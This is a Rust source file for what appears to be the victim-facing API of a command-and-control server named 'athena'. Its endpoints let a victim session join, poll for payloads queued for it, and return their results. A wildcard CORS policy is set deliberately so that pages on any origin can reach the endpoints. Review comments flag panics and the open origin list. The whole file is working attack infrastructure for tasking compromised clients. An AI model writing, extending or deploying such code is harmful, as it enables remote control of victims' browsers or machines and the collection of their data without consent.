/*
 * Copyright (C) 2021  Aravinth Manivannan <realaravinth@batsense.net>
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU Affero General Public License as
 * published by the Free Software Foundation, either version 3 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU Affero General Public License for more details.
 *
 * You should have received a copy of the GNU Affero General Public License
 * along with this program.  If not, see <https://www.gnu.org/licenses/>.
 */
use actix_identity::Identity;
use actix_web::{web, HttpResponse, Responder};
use libathena::payload::victim::*;

use crate::errors::*;
use crate::AppData;

/// Registers the victim-facing v1 endpoints on `cfg`.
///
/// `join`, `payload_response` and `get_payload` are mounted under
/// `crate::V1_ROUTES.victim.scope`, and the whole scope is wrapped in the
/// CORS policy built below.
pub fn services(cfg: &mut actix_web::web::ServiceConfig) {
    use actix_web::*;

    // CORS policy for the scope: any origin and any request header are
    // accepted, only POST is allowed, preflight results may be cached for
    // 3600 seconds, and the `Access-Control-Allow-Origin` header is sent as
    // a wildcard rather than echoing the caller's origin.
    // NOTE(review): every handler in this scope is keyed on the session
    // `Identity`; confirm that an unrestricted origin list is intended for
    // endpoints that read and write per-identity rows.
    let cors = actix_cors::Cors::default()
        .allow_any_origin()
        .allowed_methods(vec!["POST"])
        .allow_any_header()
        .max_age(3600)
        .send_wildcard();

    let victim_scope = Scope::new(crate::V1_ROUTES.victim.scope)
        .wrap(cors)
        .service(join)
        .service(payload_response)
        .service(get_payload);

    cfg.service(victim_scope);
}

// POST handler for the `join` route, relative to the victim scope.
//
// Runs `super::join_rnner` for the caller's session identity and answers
// with an empty 200 response; any error from the runner is propagated.
#[my_codegen::post(
    path = "crate::V1_ROUTES.victim.join.strip_prefix(crate::V1_ROUTES.victim.scope).unwrap()"
)]
async fn join(data: AppData, id: Identity) -> ServiceResult<impl Responder> {
    let joined = super::join_rnner(&id, &data).await;
    joined?;

    Ok(HttpResponse::Ok())
}

// POST handler for the `get_payload` route, relative to the victim scope.
//
// Returns, as a JSON `PayloadCollection`, every `cic_messages` row that
// belongs to the caller's identity and still has a NULL `response`. The
// collection is empty when no such rows exist.
#[my_codegen::post(
    path = "crate::V1_ROUTES.victim.get_payload.strip_prefix(crate::V1_ROUTES.victim.scope).unwrap()"
)]
async fn get_payload(data: AppData, id: Identity) -> ServiceResult<impl Responder> {
    super::join_rnner(&id, &data).await?;

    // NOTE(review): this unwrap panics when the session carries no identity;
    // presumably `join_rnner` guarantees one is set by this point - confirm.
    let victim_name = id.identity().unwrap();

    // The name is passed as a bound parameter ($1), never spliced into the
    // SQL text, and the sub-select restricts the rows to this identity.
    let pending = sqlx::query_as!(
        Payload,
        "SELECT id, payload_type, payload 
        FROM cic_messages 
        WHERE 
            victim_id = (SELECT ID from cic_victims WHERE name = $1)
        AND response IS NULL",
        &victim_name
    )
    .fetch_all(&data.db)
    .await?;

    // An empty result set simply yields an empty `payloads` list.
    Ok(HttpResponse::Ok().json(PayloadCollection { payloads: pending }))
}

// POST handler for the `payload_response` route, relative to the victim
// scope.
//
// Stores `payload.response` on the `cic_messages` row whose id is
// `payload.id`, but only when that row belongs to the caller's identity.
// Answers with an empty 200 response once the statement has executed.
#[my_codegen::post(
    path = "crate::V1_ROUTES.victim.payload_response.strip_prefix(crate::V1_ROUTES.victim.scope).unwrap()"
)]
async fn payload_response(
    data: AppData,
    payload: web::Json<PayloadResult>,
    id: Identity,
) -> ServiceResult<impl Responder> {
    super::join_rnner(&id, &data).await?;

    // NOTE(review): this unwrap panics when the session carries no identity;
    // presumably `join_rnner` guarantees one is set by this point - confirm.
    let victim_name = id.identity().unwrap();

    // All three values are bound parameters. The `victim_id` condition ties
    // the update to the caller, so a message id owned by another identity
    // matches no row.
    // NOTE(review): the statement's result is discarded, so a request that
    // matches zero rows still gets 200, and a row that already has a
    // response can be overwritten - confirm both are intended.
    let update = sqlx::query!(
        "UPDATE cic_messages SET response = $1
        WHERE 
            id = $2
        AND 
            victim_id = (SELECT ID from cic_victims WHERE name = $3)",
        &payload.response,
        &payload.id,
        &victim_name
    );
    update.execute(&data.db).await?;

    Ok(HttpResponse::Ok())
}